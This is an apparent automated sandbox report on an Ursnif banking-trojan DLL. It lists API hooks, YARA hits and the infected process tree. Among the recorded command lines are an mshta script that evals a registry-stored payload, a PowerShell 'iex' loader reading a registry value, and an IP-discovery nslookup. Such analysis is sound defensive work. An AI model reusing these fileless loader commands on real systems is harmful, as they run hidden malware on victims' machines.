                                                                                                                                        Data Raw: 4b 6b 6e 41 62 76 68 2b 68 31 32 7a 2b 4f 52 53 32 56 36 59 4b 4c 70 4f 7a 7a 4e 74 38 74 79 51 75 6b 6c 38 41 52 64 4f 6f 31 6c 62 72 4b 54 78 4b 79 56 4d 46 4d 4b 38 35 4e 50 42 39 61 54 55 6f 51 63 33 66 4b 6a 7a 53 30 41 49 42 48 55 67 5a 4b 36 4f 46 51 71 39 6a 78 65 38 7a 69 44 59 76 6f 73 56 79 41 32 59 72 52 50 45 4b 67 37 43 37 7a 48 39 76 6c 4e 71 58 76 6a 69 4a 43 43 34 6a 63 76 37 54 6f 45 77 48 79 68 62 45 47 37 2b 66 36 2f 6f 54 4f 72 56 6d 5a 5a 6e 63 45 5a 37 57 36 4b 70 5a 57 35 33 73 7a 68 65 4f 4a 73 30 4c 72 44 67 2b 5a 59 73 6a 6d 31 6c 64 6f 52 33 2b 36 69 2f 61 37 4d 45 50 78 39 6a 42 72 2b 35 36 6f 31 36 49 68 58 45 48 4c 6b 71 6a 4a 71 56 73 71 76 67 6a 2f 70 77 4c 61 6e 33 77 50 6a 58 78 33 2b 4f 62 77 52 70 76 71 4d 4d 78 6f 4d 58 5a 62 44 6d 38 4b 48 41 75 32 5a 2f 50 4b 46 4c 45 56 51 75 6f 4e 51 2b 62 53 68 67 69 64 79 41 57 4c 65 51 71 4a 71 37 68 62 4c 4d 55 78 72 32 6e 6b 6b 4b 6e 49 75 7a 6a 74 6d 76 70 55 31 4d 4a 71 59 4c 34 2b 6e 39 74 67 38 36 42 72 6a 58 39 79 53 56 6c 51 31 47 6c 44 33 5a 6e 73 56 4b 65 46 34 73 4a 30 62 45 4b 61 59 59 7a 32 64 62 53 79 66 63 59 47 56 72 6d 65 44 54 37 67 6e 68 34 69 2b 66 57 63 49 75 57 53 4a 68 62 53 55 61 67 2b 77 4f 49 68 35 58 42 43 6b 7a 62 74 58 6f 62 49 6b 43 50 6c 36 42 65 69 78 46 6c 78 6d 6a 33 6d 6b 37 4f 4f 33 35 4c 4b 38 62 72 52 2f 79 37 37 35 32 54 54 31 54 67 43 57 51 41 5a 39 44 75 38 4b 61 55 69 31 6a 34 6e 6b 34 67 33 73 6c 66 37 2f 5a 6e 58 64 74 39 39 6b 59 70 6d 33 57 66 59 74 35 7a 62 67 68 30 6b 78 72 6b 38 58 4c 6d 6d 6f 66 4d 6b 33 4e 45 42 63 31 36 33 6b 71 62 4f 4c 39 2f 56 38 71 5a 51 54 76 50 7a 4b 77 6b 37 6e 4c 4c 79 44 56 72 45 30 4d 4c 4f 75 6f 6f 43 2f 78 73 70 42 2f 31 6d 66 65 51 72 32 47 30 73 42 50 30 45 4e 43 68 4f 76 49 75 64 74 36 4b 34 67 66 78 79 6e 68 6a 74 4a 63 47 65 56 77 71 46 30 39 7a 7a 36 67 45 39 57 73 4b 49 67 44 4d 5a 42 35 65 57 73 75 78 4d 48 58 37 4c 44 4b 55 43 31 46 36 68 61 65 62 67 32 47 71 38 38 6d 38 48 61 6f 64 39 42 38 64 44 34 35 56 59 4d 58 42 71 68 5a 34 30 6a 59 65 65 32 37 65 43 67 6b 34 79 2f 38 52 78 46 38 41 34 48 54 6d 64 38 48 6e 54 52 78 71 2b 45 39 78 58 2b 38 63 72 66 73 65 63 42 61 6f 39 62 52 65 6d 4c 54 32 47 6a 50 6b 6d 43 68 63 57 56 72 51 31 4b 57 6d 73 44 4a 7a 74 58 41 43 62 79 53 32 6e 4b 71 35 4c 30 71 50 4b 4a 58 50 50 39 32 6c 6d 6b 47 48
                                                                                                                                        Data Ascii: KknAbvh+h12z+ORS2V6YKLpOzzNt8tyQukl8ARdOo1lbrKTxKyVMFMK85NPB9aTUoQc3fKjzS0AIBHUgZK6OFQq9jxe8ziDYvosVyA2YrRPEKg7C7zH9vlNqXvjiJCC4jcv7ToEwHyhbEG7+f6/oTOrVmZZncEZ7W6KpZW53szheOJs0LrDg+ZYsjm1ldoR3+6i/a7MEPx9jBr+56o16IhXEHLkqjJqVsqvgj/pwLan3wPjXx3+ObwRpvqMMxoMXZbDm8KHAu2Z/PKFLEVQuoNQ+bShgidyAWLeQqJq7hbLMUxr2nkkKnIuzjtmvpU1MJqYL4+n9tg86BrjX9ySVlQ1GlD3ZnsVKeF4sJ0bEKaYYz2dbSyfcYGVrmeDT7gnh4i+fWcIuWSJhbSUag+wOIh5XBCkzbtXobIkCPl6BeixFlxmj3mk7OO35LK8brR/y7752TT1TgCWQAZ9Du8KaUi1j4nk4g3slf7/ZnXdt99kYpm3WfYt5zbgh0kxrk8XLmmofMk3NEBc163kqbOL9/V8qZQTvPzKwk7nLLyDVrE0MLOuooC/xspB/1mfeQr2G0sBP0ENChOvIudt6K4gfxynhjtJcGeVwqF09zz6gE9WsKIgDMZB5eWsuxMHX7LDKUC1F6haebg2Gq88m8Haod9B8dD45VYMXBqhZ40jYee27eCgk4y/8RxF8A4HTmd8HnTRxq+E9xX+8crfsecBao9bRemLT2GjPkmChcWVrQ1KWmsDJztXACbyS2nKq5L0qPKJXPP92lmkGH


                                                                                                                                        Code Manipulations

                                                                                                                                        User Modules

                                                                                                                                        Hook Summary

                                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                                                                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                                                                                                        CreateProcessAsUserWEATexplorer.exe
                                                                                                                                        CreateProcessAsUserWINLINEexplorer.exe
                                                                                                                                        CreateProcessWEATexplorer.exe
                                                                                                                                        CreateProcessWINLINEexplorer.exe
                                                                                                                                        CreateProcessAEATexplorer.exe
                                                                                                                                        CreateProcessAINLINEexplorer.exe

                                                                                                                                        Processes

                                                                                                                                        Process: explorer.exe, Module: user32.dll
                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                                                                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT687571C
                                                                                                                                        Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                        CreateProcessAsUserWEAT7FFABB03521C
                                                                                                                                        CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                        CreateProcessWEAT7FFABB035200
                                                                                                                                        CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                        CreateProcessAEAT7FFABB03520E
                                                                                                                                        CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                        Process: explorer.exe, Module: WININET.dll
                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                        api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                                                                                                        api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT687571C

                                                                                                                                        Statistics

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Start time:01:30:02
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\https___purefile24.top_4352wedfoifom.dll'
                                                                                                                                        Imagebase:0x1130000
                                                                                                                                        File size:119808 bytes
                                                                                                                                        MD5 hash:76E2251D0E9772B9DA90208AD741A205
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                        Reputation:moderate

                                                                                                                                        General

                                                                                                                                        Start time:01:30:17
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                        Imagebase:0x7ff716b10000
                                                                                                                                        File size:823560 bytes
                                                                                                                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:01:30:18
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2
                                                                                                                                        Imagebase:0x9d0000
                                                                                                                                        File size:822536 bytes
                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:01:31:01
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                        Imagebase:0x7ff716b10000
                                                                                                                                        File size:823560 bytes
                                                                                                                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:01:31:02
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2
                                                                                                                                        Imagebase:0x9d0000
                                                                                                                                        File size:822536 bytes
                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:01:31:04
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2
                                                                                                                                        Imagebase:0x9d0000
                                                                                                                                        File size:822536 bytes
                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:01:31:06
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2
                                                                                                                                        Imagebase:0x9d0000
                                                                                                                                        File size:822536 bytes
                                                                                                                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:01:31:12
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
                                                                                                                                        Imagebase:0x7ff762c40000
                                                                                                                                        File size:14848 bytes
                                                                                                                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate

                                                                                                                                        General

                                                                                                                                        Start time:01:31:13
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
                                                                                                                                        Imagebase:0x7ff7bedd0000
                                                                                                                                        File size:447488 bytes
                                                                                                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:01:31:14
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:01:31:19
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
                                                                                                                                        Imagebase:0x7ff6d87f0000
                                                                                                                                        File size:2739304 bytes
                                                                                                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:moderate

                                                                                                                                        General

                                                                                                                                        Start time:01:31:20
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
                                                                                                                                        Imagebase:0x7ff62df80000
                                                                                                                                        File size:47280 bytes
                                                                                                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate

                                                                                                                                        General

                                                                                                                                        Start time:01:31:23
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
                                                                                                                                        Imagebase:0x7ff6d87f0000
                                                                                                                                        File size:2739304 bytes
                                                                                                                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:moderate

                                                                                                                                        General

                                                                                                                                        Start time:01:31:24
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
                                                                                                                                        Imagebase:0x7ff62df80000
                                                                                                                                        File size:47280 bytes
                                                                                                                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate

                                                                                                                                        General

                                                                                                                                        Start time:01:31:29
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:
                                                                                                                                        Imagebase:0x7ff6fee60000
                                                                                                                                        File size:3933184 bytes
                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        General

                                                                                                                                        Start time:01:31:32
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\control.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                        Imagebase:0x7ff672e40000
                                                                                                                                        File size:117760 bytes
                                                                                                                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        General

                                                                                                                                        Start time:01:31:40
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:
                                                                                                                                        Imagebase:0x7ff6b0ff0000
                                                                                                                                        File size:99272 bytes
                                                                                                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        General

                                                                                                                                        Start time:01:31:41
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\rundll32.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                                                                        Imagebase:0x7ff6a9390000
                                                                                                                                        File size:69632 bytes
                                                                                                                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        General

                                                                                                                                        Start time:01:31:42
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 652
                                                                                                                                        Imagebase:0x880000
                                                                                                                                        File size:434592 bytes
                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:01:31:43
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
                                                                                                                                        Imagebase:0x7ff622070000
                                                                                                                                        File size:273920 bytes
                                                                                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:01:31:44
                                                                                                                                        Start date:26/11/2020
                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:
                                                                                                                                        Imagebase:0x7ff6b0ff0000
                                                                                                                                        File size:99272 bytes
                                                                                                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        Disassembly

                                                                                                                                        Code Analysis

                                                                                                                                        Reset < >